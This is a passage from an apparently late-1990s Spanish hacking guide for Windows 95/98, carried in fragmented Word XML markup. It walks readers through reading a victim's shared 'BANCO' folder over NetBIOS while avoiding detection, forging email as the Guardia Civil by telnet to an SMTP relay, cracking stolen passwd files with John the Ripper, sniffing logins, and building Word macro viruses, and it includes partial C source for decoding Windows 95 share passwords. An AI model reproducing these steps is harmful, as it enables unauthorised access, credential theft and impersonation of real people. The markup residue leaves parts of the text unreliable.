de la victima a nuestro Netbios y  esto seria de la siguiente forma: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c:\&gt;NBTSTAT -R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Ahora nos interesa saber que recursos comparte la victima y esto tampoco</w:t>
      </w:r>
      <w:r w:rsidR="00FF7CC8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> n</w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> nos traera complicacion alguna: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c:\&gt;net view \\VICTIMAMACHINE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Shared resources at \\VICTIMAMACHINE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Sharename    Type         Comment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BANCO        Disk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Y como podemos observar comparte una carpeta llamada BANCO.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Ahora ya podemos operar como si fuese una terminal mas en nuestra red local sobre win95/98. Ya solo nos queda ejecutar el comando que querramos, si por  ejemplo queremos ver el contenido, solo tenemos que escribir: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 dir \\VICTIMAMACHINE\BANCO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 para leer cualquier fichero de la carpeta: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 type \\VICTIMAMACHINE\BANCO\CUENTABANCARIA.TXT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Si queremos conectar al recurso compartido de forma grafica (o sea con  una ventana y no seguir usando el MS-DOS), solo tenemos que pulsar  INICIO-&gt;BUSCAR PC y dentremos el PC remoto pero esto solo es posible  si hemos a¤adido la VICTIMAMACHINE a una unidad de red a la que podamos  llamar, deberemos ejecutar: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c:\&gt;NET USE e: \\MIPC\WINDOWS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tecnica solo funciona si la maquina remota ejecuta win95/98 o win 3.11  y ademas comparte las carpetas sin contrase¤a en modo "Acceso a nivel  compartido" MIPC-&gt;Panel de control-&gt;Red | Control de acceso. Si utilizase  el "Acceso a nivel de usuario" nuestro grupo debe estar autorizado en  esa maquina. Podemos probar a intentar insertar el grupo de nuestra maquina  para que este autorizada, esto lo conseguiremos con el Regedit, por  desgracia los sistemas win95/98 y OSR2 que estan ejecutando el Servidor Web  Personal de Microsoft desactivan esta posibilidad de acceso remoto tras  informar de la conveniencia de hacerlo al usuario, ya que el servidor web  obliga a compartir carpetas aun sin tener red local.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Logicamente un usuario que haya tenido el despiste de conectarse a Internet  con carpetas compartidas no toma luego medidas de control sobre quien  entra en su maquina. Pero no hay que hacer ilusiones ya que podemos ser  pillados si por ejemplo un usuario ejecuta el programa Netwatch, que  muestra los usuarios conectados a nuestra computadora en cada momento y por  supuesto el nombre de las computadoras por lo que es aconsejable cambiar el  nombre de nuestra computadora usando el Regedit. Si nuestra maquina se  llama HACKERNOBO cambiamos todas la cadenas donde aperezca este nombre con  el Regedit a un nombre menos sospechoso.   Si no conectamos la VICTIMAMACHINE como una unidad mas a nuestra  computadora no nos tendremos que preocupar del Netwatch, asi conseguiremos  una cierta seguridad personal ya que lo mas seguro, la VICTIMAMACHINE no se  dara cuenta de nuestra entrada. Tambien hay que decir que si la  VICTIMAMACHINE quiere apagar su </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>computadora le saldra el mensaje del tipo  "hay otros usuarios conectados a su ordenador, si apaga se desconectaran"  si ocurre esto seremos pillados.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Decir que el comando Net, dispone de muchos parametros que nos puede ser  utiles y ademas podemos jugar durante mucho tiempo con ellos :) los cuales son los siguientes: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c:\&gt;net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For more information about a specific Microsoft NET  command, type the command name followed by /?  (for example, NET VIEW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CONFIG   Displays your current workgroup settings.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DIAG     Runs the Microsoft Network Diagnostics program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display diagnostic information about your network.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HELP     Provides information about commands and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error messages.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INIT     Loads protocol and network-adapter drivers without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binding them to Protocol Manager.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LOGOFF   Breaks the connection between your computer and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the shared resources to which it is connected.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LOGON    Identifies you as a member of a workgroup.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PASSWORD Changes your logon password.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PRINT    Displays information about print queues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and controls print jobs.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START    Starts services.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STOP     Stops services.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TIME     Displays the time on or synchronizes your computer's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clock with the clock on a Microsoft Windows for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Workgroups, Windows NT, Windows 95, or NetWare time server.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USE      Connects to or disconnects from a shared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resource or displays information about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connections.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VER      Displays the type and version number of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workgroup redirector you are using.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 VIEW     Displays a list of computers that share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resources or a list of shared resources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on a specific computer.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The command was completed successfully.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Pues aqui teneis todos los parametros disponibles del comando Net, por lo  que solo nos queda jugar un rato para saber que es cada cosa. No es  divertido si os lo explico todo.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xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidR="00FF7CC8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>4-5. Fake Mail Con El Telnet?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Esta tecnica nos ayuda a suplantar la direccion de correo electronica que  querramos :). La verdad es que tiene pocos usos, en mi opinion debido a  una serie de razones pero siempre puede servir para gastar una buena  broma enviando aun amigo un mail del director de la Universidad diciendo  que ha sido expulsado por pirata }:-) y no te cuento si es un mail de la  Guardia Civil. La verdad es que es muy sencillo de hacer pero por supuesto habra que tomar  unas ciertas medidas de seguridad, que ya explicare luego. Lo primero  que tenemos que hacer es ejecutar el cliente Telnet (sobre el manejo del  Telnet ya lo explique mas arriba) y donde </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>pone "puerto" en vez de poner  el puerto 23 pondremos el 25 que corresponde al puerto del mail y esperamos  a que nos conectemos a ese puerto, cuando conectemos nos saldra un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mensaje y esta esperando a que pulsemoa alguna tecla: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220 Howdy From mail.airmail.net running Smail 3.1.30.16 (ESMTP)    [d/o/u/g] ready at Thu, 10 Oct 96 00:03:17 -500 (CDT)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Muchas veces lo que podemos hacer es escribir "help" y saldran todos los  comandos, tambien podemos escribir "echo" y la maquina nos contestara que  esta lista. Para escribir un mail hay que seguir una serie de pasos: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mail from:gc.uco@mad.servicom.es &lt;- ponemos de donde viene.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 servidor nos contesta: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250 &lt;gc.uco@mad.servicom.es&gt; ... Sender Okay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Ahora escribimos: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rcpt to:nob_ody@xxxxxxxx.com &lt;- a quien se lo enviamos.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 servidor nos contesta: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250 &lt;nob_ody@xxxxxxxx.com&gt; ... Recipiant Okay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Ahora escribimos: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data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 servidor nos contesta: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354 Enter mail, end with "." on a line by itself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Ahora escribimos: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To: nob_ody@xxxxxxxx.com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From: gc.uco@mad.servicom.es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Subject: Te querremos!!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Bueno nobody, solo te queremos decir que nos gusta tu trabajo y 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querremos fichar para el departamento.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Direccion General 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la Guardia Civil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&lt;- para terminar el mail.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 servidor nos contesta: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250 Mail accepted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Ahora escribimos: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quit  &lt;- ya esta todo listo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Pues ves como es realmente simple!! Pero antes de empezar a jugar con  esta tecnica tenemos que asegurarnos que el servidor de mail no regrista  nuestro IP, esto lo podremos averiguar si enviamos un mail de prueba a  alguna cuenta anomima que tengamos. Si vemos que en la cabecera del mail  sale nuestro IP ese servidor no sirve. Hay listas disponibles por Internet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sobre servidores que permiten hacer esto.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xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidR="00FF7CC8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>4-6. Cambiando El Entorno?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tecnica no es que sea propia del hacking ya que solo sirve para  cambiar la pantalla de inicio o la de finalizar windows. Los logos de  windows tienen un formato BMP 320X400 pero estan clamuflados en ficheros  con extension SYS pero siguen siendo realmente BMP'S.   El logo del principio de windows (ya sabes el de las nubes) lo podeis  encontrar como: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c:\&gt;logo.sys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Si no encuentras este fichero, entonces lo que tenemos que hacer es crearlo  y grabarlo alli mismo y cuando windows vuelva a reiniciar usara nuestro  grafico y si lo volvemos a quitar, usara el de siempre. El logo del final  (cuando cierra windows) esta en el directorio windows y lo podemos  encontrar como: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c:\windows&gt;logos.sys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Logicamente es obligatorio que los graficos que querramos sustituir  tengan de tama¤o 320x400 y sean ficheros BMP'S. Conviene que les pongamos  el atributo de ocultos, que esto se hace con el comando Attrib, por  ejemplo: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c:\windows&gt;attrib +h logos.sys &lt;- lo oculta.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c:\windows&gt;attrib -h logos.sys &lt;- lo hace visible.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00205350" w:rsidRPr="00FF7CC8" w:rsidRDefault="00205350" w:rsidP="00205350">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF7CC8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:b/>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4-7. Finger?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La utilidad Finger, muy usada en Unix, en realidad no esta disponible en  Win95/98 pero como somos Hackers nosotros si que somos capaces desde  Win95/98. Finger se utiliza para obtener informacion de un servidor. Puede  parecer una tonteria pero es util, por ejemplo, podemos empezar a sacar los  Login's de los usuarios y empezar a adivinar sus passwords, tambien podemos  vigilar al root del servidor (cada cuanto tiempo conecta, cuando fue la  ultima vez que estuvo, etc...) y asi muchas cosas.  La verdad es que para usar el Finger usaremos cualquier navegador, IE o  Netscape. Simplemete nos dirigimos a un url un poco especial, es un web  que permite hacer Finger a cualquier host y nos deveulve los resultados.  Esto se conoce como "Finger Gateway". El url del web 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http://www.hgp.med.umich.edu/cgi-bin/finger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4-8. Whois?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00205350" w:rsidRPr="00FF7CC8" w:rsidRDefault="00205350" w:rsidP="00205350">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF7CC8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:b/>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La utilidad Whois, al igual que Finger es muy comun en Unix y no esta  disponible en Win95/98 pero comos somos asi de listos saldremos del apuro.  Tambien sirve para pedir informacion de un servidor pero no el igual que  Finger, ya que se diferencian en el tipo de informacion, el finger se suele  utilizar mucho para buscar direcciones de correo mientras que el Whois,  para averiguar informacion sobre un servidor en concreto.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Para usar esta utilidad, ejecutamos el Telnet y nos dirigimos a un  host muy especial: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c:\&gt;telnet whois.internic.net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Por supuesto Internic, una empresa privada norte ameriacana que se  encarga de controlar los dominios de Internet, y podemos usar su base  de datos para pedir informacion sobre un servidor.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Cuando conectemos a la base de datos de Internic, escribimos "Whois nombre_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del_servidor" y nos sacara la informacion.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telnet InterNIC &gt; whois aol.com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Connecting to the rs Database . . . .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Connected to the rs Database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America Online (AOL-DOM)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12100 Sunrise Valley Drive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Reston, Virginia 22091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Domain Name: AOL.COM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Administrative Contact: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O'Donnell, David B  (DBO3)  PMDAtropos@AOL.COM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703/453-4255 (FAX) 703/453-4102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Technical Contact, Zone Contact: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America Online  (AOL-NOC)  trouble@aol.net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703-453-5862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Billing Contact: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Barrett, Joe  (JB4302)  BarrettJG@AOL.COM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703-453-4160 (FAX) 703-453-4001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Record last updated on 13-Mar-97.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Record created on 22-Jun-95.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Domain servers in listed order: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DNS-01.AOL.COM               152.163.199.42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DNS-02.AOL.COM               152.163.199.56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DNS-AOL.ANS.NET              198.83.210.28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Como vemos hemos pedido informacion sobre AOL.COM, American On-Line. Y esto  es lo que nos ha sacado Internic. Al final podemos ver los dominios  asociados a AOL. Pues sencillo y muy util, el whois.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4-9. Tracert?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utilidad que si esta implementada en Win95/98, nos sirve para calcular  el tiempo que tarda un paquete de un servidor hasta otro y ademas podemos  saber por cuantos servidores pasa. Muy util para sacar posibles servidores  victimas si nos llaman la atencion.  Para usar esta utilidad, abrimos una ventana MS-DOS y escribimos Tracert,  a secas y nos sacara el menu de opciones disponible.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c:\&gt;tracert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Usage:tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name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Options: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                 Do not resolve addresses to hostnames.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 maximum_hops    Maximum number of hops to search for target.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-j host-list       Loose source route along host-list.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 timeout         Wait timeout milliseconds for each reply.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Pues como veis, no tiene ningun misterio las opciones del Tracert, por  lo que ya aprendereis su uso con la experiencia. Ahora escribimos una  direccion IP cuando invocamos al Tracert, de la siguente forma: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c:\&gt;tracert 198.83.210.28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Tracing route to dns-aol.ans.net [198.83.210.28]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over a maximum of 30 hops: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1   *        *        *     Request timed out.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2 138 ms  145 ms  135 ms 204.134.78.201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3 212 ms  191 ms  181 ms glory-cyberport.nm.westnet.net [204.134.78.33]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4 166 ms  228 ms  189 ms enss365.nm.org [129.121.1.3]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5 148 ms  138 ms  177 ms h4-0.cnss116.Albuquerque.t3.ans.net [192.103.74.45]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6 284 ms  296 ms  178 ms f2.t112-0.Albuquerque.t3.ans.net [140.222.112.221]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7 298 ms  279 ms  277 ms h14.t64-0.Houston.t3.ans.net [140.223.65.9]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8 238 ms  234 ms  263 ms h14.t104-0.Atlanta.t3.ans.net [140.223.65.18]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9 301 ms  257 ms  250 ms dns-aol.ans.net [198.83.210.28]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Trace complete.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Aqui podeis por todos lo sitios que ha pasado el paquete que hemos enviado  al IP 198.83.210.28. Y asi podemos con todos los servidores de Internet.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4-10. Winipcfg?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00205350" w:rsidRPr="00FF7CC8" w:rsidRDefault="00205350" w:rsidP="00205350">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF7CC8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:b/>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Ejecutando este comando, nos saldra una ventana windows informandonos de  los diferentes valores de nuestra red. Realmente util para verificar la  configuracion.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4-11. Ipconfig?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Este programa es similar al anterior descrito pero funciona en modo MS-DOS.  Al igual nos sirve para verificar la configuracion de nuestra red. Por  ejemplo, lo ejecutamos asi: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C:\WINDOWS&gt;ipconfig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Windows 98 IP Configuration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0 Ethernet adapter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IP Address. . . . . . . . . : 0.0.0.0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Subnet Mask . . . . . . . . : 0.0.0.0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Default Gateway . . . . .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Decir que en el ordenador donde estoy escribiendo este articulo, no lo  tengo en estos momentos en red, por eso no lo tengo configurado. Para pedir  las diferentes opciones, ejecutamos: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C:\WINDOWS&gt;ipconfig -h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Windows 98 IP Configuration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Command line options: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/All - Display detailed information.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/Batch [file] - Write to file or ./WINIPCFG.OUT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/renew_all    - Renew   all adapters.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/release_all  - Release all adapters.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/renew   N    - Renew   adapter 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/release N    - Release adapter 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No veo la necesidad de traducir esto debido a que es realmente facil, en  caso de no entender nada, aprende ingles :) Pero la que mas nos puede  interesar es la opcion /All.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4-12. Arp?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Ejecutamos este comando para que nos muestre o para modificar nuestra IP  en nuestra red, mantenida por un servidor Windows NT. Por ejemplo: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C:\WINDOWS&gt;arp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Displays and modifies the IP-to-Physical address translation tables used by  address resolution protocol (ARP).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ARP -s inet_addr eth_addr [if_addr]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ARP -d inet_addr [if_addr]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ARP -a [inet_addr] [-N if_addr]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          Displays current ARP entries by interrogating the current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protocol data.  If inet_addr is specified, the IP and Physical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addresses for only the specified computer are displayed.  If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more than one network interface uses ARP, entries for each ARP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table are displayed.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          Same as -a.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inet_addr   Specifies an internet address.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 if_addr  Displays the ARP entries for the network interface specified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by if_addr.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          Deletes the host specified by inet_addr.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          Adds the host and associates the Internet address inet_addr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with the Physical address eth_addr.  The Physical address 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given as 6 hexadecimal bytes separated by hyphens. The entry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is permanent.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eth_addr    Specifies a physical address.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if_addr     If present, this specifies the Internet address of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interface whose address translation table should be modified.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not present, the first applicable interface will be used.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Example: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&gt; arp -s 157.55.85.212   00-aa-00-62-c6-09  .... Adds a static entry.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arp -a                                    .... Displays the arp table.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Y como viene siendo habitual, os remito a aprender ingles y a jugar con las  distintos parametros que tiene este comando.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4-13. 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comando nos permitira manejar la tabla local TCP/IP. Al igual que los  demas comandos dispone de varios parametros, los cuales son los siguientes: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Manipulates network routing tables.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ROUTE [-f] [command [destination] [MASK netmask] [gateway] [METRIC metric]]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           Clears the routing tables of all gateway entries.  If this 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used in conjunction with one of the commands, the tables are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cleared prior to running the command.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command      Must be one of four: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     Prints   a  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ADD       Adds     a  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DELETE    Deletes  a  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CHANGE    Modifies an existing route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destination  Specifies the destination host.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MASK         Specifies that the next parameter is the 'netmask' value.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netmask      Specifies a subnet mask value to be associated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with this route entry. If not specified, it defaults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255.255.255.255.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gateway      Specifies gateway.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METRIC       Specifies that the next paramenter 'metric' is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cost for this destination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All symbolic names used for destination are looked up in the network  database file NETWORKS. The symbolic names for gateway are looked up in the  host name database file HOSTS.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the command is PRINT or DELETE, wildcards may be used for the destination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and gateway, or the gateway argument may be omitted.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Diagnostic Notes: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Invalid MASK generates an error, that is when (DEST &amp; MASK) != DEST.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Example&gt; route ADD 157.0.0.0 MASK 155.0.0.0 157.55.80.1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The route addition failed: 87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Examples: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route PRINT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route   ADD 157.0.0.0     MASK 255.0.0.0   157.55.80.1 METRIC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^destination       ^mask       ^gateway            ^metric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route PRINT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route DELETE 157.0.0.0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route PRINT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Creo que queda bastante claro, incluso provee distintos ejemplos para  familiarizarnos con este comando.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FF7CC8" w:rsidRDefault="00FF7CC8"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4-14. Netstat?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comando nos puede ser muy util para saber que conexiones tenemos  activas en el momento de ejecutar este comando, para conexiones TCP/IP, lo  ejecutamos asi, solo que en mi caso no saldra ya que no estoy conectado en  este momento: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C:\WINDOWS&gt;netstat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Active Connections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Proto  Local Address          Foreign Address        State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Como veis no sale nada, pero si lo ejecutais cuando esteis conectados, ya  vereis :) Como siempre este comando dispone de varios parametros, que son  los siguientes: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C:\WINDOWS&gt;netstat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Displays protocol statistics and current TCP/IP network connections.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NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]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          Displays all connections and listening ports.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          Displays Ethernet statistics. This may be combined with the -s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option.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          Displays addresses and port numbers in numerical form.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 proto    Shows connections for the protocol specified by proto; proto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may be TCP or UDP.  If used with the -s option to display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per-protocol statistics, proto may be TCP, UDP, or IP.</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          Displays the routing table.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          Displays per-protocol statistics.  By default, statistics are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shown for TCP, UDP and IP; the -p option may be used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specify a subset of the default.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interval    Redisplays selected statistics, pausing interval seconds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between each display.  Press CTRL+C to stop redisplaying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statistics.  If omitted, netstat will print the current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configuration information once.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Ya solo nos queda jugar con los distintos parametros y aprender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E0323C"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E0323C" w:rsidRDefault="00E0323C" w:rsidP="00205350">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
      </w:pP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lastRenderedPageBreak/>
        <w:t>5. Utilizacion De Tools?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En esta seccion os explicare diferentes tools que podeis usar para hacking,  por supuesto hay que buscarlas por Internet, no pondre el url para encontrarlas, ya que a lo mejor cuando estas leyendo esta guia ya no existe, pero os dire como se llama el programa asi lo podras buscar ademas esto  tambien te servira para que te espabiles y sepas buscar cosas por Internet.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Logicamente esta guia es para win95/98 y los programas que explicare seran  para win95/98 pero tambien me veo obligado a explicar varias tools que no  son de win95/98 propiamente sino de MS-DOS pero que son necesarias y ademas  corren en modo MS-DOS de win95/98.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xml:space="preserve">   5-1. Skamwerks lab version 1.1b</w:t>
      </w:r>
      <w:r w:rsidR="00E0323C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>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programa es un util herramienta que nos ayuda a crear de forma rapida  virus macro, o sea para el Word. Tiene que estar instalado el Word para  que este programa nos funcione.  Al ejecutar el programa nos aparecera una ventana con 2 botones los caules  son las 2 opciones que podemos escoger "Virii Wizard" o "Advanced Users".  El "virii Wizard" es la opcion, si no sabemos muy bien como crear un virus  de macro ya que nos moveremos por varios menus y crearemos un virus de  forma rapida y facilmente. La otra opcion, "Advanced Users" es para  aquellos que sepan de Word Basic, el lenguaje de programacion del Word, ya  que podemos meter codigo Word basic directamente y asi crear un virus a nuestro gusto.  Como este no es un curso sobre virus, no me voy a enrollar sobre la utilizacion exacta del programa. En mi opinion es un buen programa,  en ingles :) programado en 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xml:space="preserve">   5-2. WaReZ! Version 95.12.31</w:t>
      </w:r>
      <w:r w:rsidR="00E0323C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>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programa es un cliente FTP que muestra los directorios ocultos en un  servidor, util si nos metemos en algun sitio sospechoso. Como ya es  costumbre para que nos funcione tenemos que tener instalado el WINSOCK.DLL  correctamente.  Al igual que antes tampoco hay que explicar mucho sobre este programa ya  que su Interface es igual que el cliente WS_FTP que suele ser muy familiar  para todos, por lo que no encontraremos mucha dificultad en su manejo.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5-3. John the ripper v1.4?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magnifica tool no es propiamente de win95/98 pero seria un pecado no  hablar de ella, cuando corre sobre win95/98 de maravilla (bueno, dentro de  lo que cabe :). John, como se le conoce, sirve para crackear un fichero  unix de password (el conocido etc/passwd, como ya digo aprended algo de  unix).</w:t>
      </w:r>
      <w:r w:rsidR="00E0323C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cuando robemos un fichero passwd de un servidor, lo que tenemos que hacer  es usar el John para sacar cuentas, pero no solo basta esto sino tambien  necesitamos un buen diccionario y una combinacion de suerte y paciencia. Supongamos que ya tenemos todo (fichero passwd, John y un diccionario), entonces tenemos que abrir una ventana MS-DOS y llamar al John, si lo llamamos sin nigun parametro nos saldran un listado de opciones, esto seria  asi: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c:\&gt;john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Usage: john [flags] [passwd files]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Flags:-pwfile:&lt;file&gt;[,..]     specify passwd file(s)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-wordfile:&lt;file&gt; -stdin wordlist mode, read words from &lt;file&gt; or stdin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-rules                  enable rules for wordlist mode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-incremental[:&lt;mode&gt;]   incremental mode [using john.ini entry &lt;mode&gt;]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-single                 single crack mode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-external:&lt;mode&gt;        external mode, using john.ini entry &lt;mode&gt;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-restore[:&lt;file&gt;]       restore session [from &lt;file&gt;]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-makechars:&lt;file&gt;       make a charset, &lt;file&gt; will be overwritten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-show                   show cracked passwords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-test                   perform a benchmark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-users:&lt;login|uid&gt;[,..] crack this (these) user(s) only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-shells:[!]&lt;shell&gt;[,..] crack users with this (these) shell(s) only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-salts:[!]&lt;count&gt;      crack salts with at least &lt;count&gt; accounts only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-lamesalts              assume plaintext passwords were used as salts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-timeout:&lt;time&gt;         abort session after a period of &lt;time&gt; minutes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-list                   list each word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-beep -quiet            beep or don't beep when a password is found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-noname -nohash        don't use memory for login names or hash tables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-des -md5               force DES or MD5 mode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Veis? :), y como siempre no explicare que es cada opcion os lo dejo para  que jugueis vosotros solitos!. Ahora, ya podemos crackear el fichero,  para ello escogermos la opcion "single", ya que el john no nos pedira  un fichero de diccionario, si fuese el caso que no tenemos, ponemos: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c:\&gt;john -single passwd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Y el John se pondra a trabajar, cuando halla acabo creara un fichero  llamado "John.pot" donde se almacenaran los passwords encriptados con  su correspodiente passwords desencriptado (esta definicion no es del  todo correcta pero es para que lo entendais) y ya tenemos unas cuentas  de acceso al servidor.  Este metodo va bien para la primera pasado con el John pero luego conviene  usar un diccionario y con el diccionario seria de la siguiente manera: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c:\&gt;john -wordfile:spain.txt passwd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El John seguiria el mismo proceso antes descrito, por supuesto si el  fichero "John.pot" esta creado ya, les a¤adira los resultados obtenidos  a este fichero, por cierto este fichero tiene atributo de solo lectura.   Pues aqui se acaba la explicacion del John, que seguro que ya aprendereis  a manejar correctamente. Referente a los diccionarios hay varias  herramientas que corren bajo MS-DOS que crean diccionarios o tambien  podeis buscar por Internet ya que hay varios web's llenos de diccionarios.  Decir que la ultima version del John The Ripper es la 1.5.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5-4. Gobbler v 2.1?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Volvemos a la carga con otro programa que no es del win95/98 propiamente,  pero es un sniffer que podemos usar bajo win95 en una red Ethernet. Un  Sniffer para aquellos que no sepan, es un programa que captura los paquetes   que pasan por una red y asi se pueden conseguir logins, passowrds u otro  tipo de informacion que querramos, logicamente si los paquetes estan  encriptados, esto dificultara el proceso, ya que habra que desencriptarlos  si se puede. Como siempre abrimos una ventana y ejecutamos el programa de la siguiente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manera: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c:\&gt;gobbler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Y se activara el programa y veremos una serie de ventanas, en este punto,  pulsamos el &lt;ESC&gt; y saldra una ventana con un menu. Ahora tenemos que  configurar el programa para nuestra </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>red, la verdad es que es muy sencillo  de utilizar, con un poco de practica dominaremos este sniffer facilmente. Como sugerencia conviene leer el fichero de documentacion que trae, ya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que explica como configurar el programa.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5-5. Sharepasswd?</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programa desencripta el passorwd de win95/98. Esta en lenguaje C, como  supongo todo el mundo tiene que tener un compilador en C y si no ya estas  buscando uno, que hay muchos y gratis por Internet. No veo la necesidad  de explicaros el programa ya que tambien incluyo la explicacion del  autor la cual esta muy bien, logicamente.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Codigo Fuente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This program takes an 'encrypted' Windows 95 share password and decrypts it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Look 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HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan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to find a machine's shares.  Within the data for each share are two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registry entries, Parm1enc and Parm2enc.  Parm1enc is the "Full access"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password.  Parm2enc is the "Read only" password.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David Ross  2/9/96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snakey@cs.umd.edu</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Do not distribute this program for any commercial purpose without first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contacting me for permission.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DO NOT USE THIS PROGRAM FOR ILLEGAL OR UNETHICAL PURPOSES!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 technical description of the 'code' can be found later on in this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document.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Oh yeah...  a totally unsolicited self promotion here...  If anyone has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 job for a junior year Computer Science student for summer '96, please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let me know!  I'm familiar with Windows and Mac networking (especially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involving TCP/IP), fluent in C and C++, and working on becoming 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proficient Windows programmer.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&lt;stdio.h&gt;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&lt;string.h&gt;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#define BUFFER 30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DecodeCharOne(unsigned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DecodeCharTwo(unsigned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DecodeCharThree(unsigned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DecodeCharFour(unsigned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DecodeCharFive(unsigned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DecodeCharSix(unsigned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DecodeCharSeven(unsigned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DecodeCharEight(unsigned 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main()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Generic counter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eocc = 0;    /* Records if there has been an error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following structure stores the encoded bytes.  Decoded values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replace the encoded values as the decoding process moves along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initial values show here are not used and are unimportant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mybytes[] = { 0x15, 0xba, 0x6d, 0x86, 0x73, 0x89, 0xf4, 0x4a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short tempshort;   /* Used as a go-between from sscanf()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 xml:space="preserve"> mybytes[] so unaligned data accesses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 xml:space="preserve"> don't occur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goupto = 0;  /* Records how many characters there are to be decoded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following code handles input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char inpt[BUFFER];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char *inptptr;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printf("Input the byte code in hex (ex: 76 d5 09 e3):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fgets(inpt, BUFFER, stdin);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inptptr = strtok(inpt,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(inpt[0] != '\n')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 ((inptptr != NULL) &amp;&amp; (goupto &lt; 8))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sscanf(inptptr, "%hx", &amp;tempshort);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mybytes[goupto++] = tempshort;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inptptr = strtok(NULL,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Decode all the characters.  I could have made this stop immediately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after an error has been found, but it really doesn't matter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(!DecodeCharOne(&amp;mybytes[0]))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(!DecodeCharTwo(&amp;mybytes[1]))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(!DecodeCharThree(&amp;mybytes[2]))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(!DecodeCharFour(&amp;mybytes[3]))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(!DecodeCharFive(&amp;mybytes[4]))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(!DecodeCharSix(&amp;mybytes[5]))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(!DecodeCharSeven(&amp;mybytes[6]))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(!DecodeCharEight(&amp;mybytes[7])) eocc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If the password could be decoded, print it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(eocc) printf("The encrypted password is invalid.\n");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printf("The decoded password is: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for (i = 0; i &lt; goupto; i++) printf("%c",mybytes[i]);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printf("\"\n");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main()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 will document this function, but not the seven other functions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which decode the subsequent seven characters.  All of these functions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are essentially the same.  Multiple functions are necessary though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because each column of the password has a different set of encoding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patterns.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following section will attempt to explain the encoding scheme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for share passwords as stored in the Windows 95 registry.  I will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try to explain this as clearly as I can, however I really have no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background in encryption.  If you have any questions, please feel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free to send them to me at snakey@cs.umd.edu.</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First off, share passwords can be anywhere from one character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eight.  "Read only" passwords and "Full access" passwords both use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same encoding scheme, and so they both can be decoded by this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  There is a one-to-one relationship between the number of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characters in a password and the number of bytes in the encoded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password stored in the registry.  In 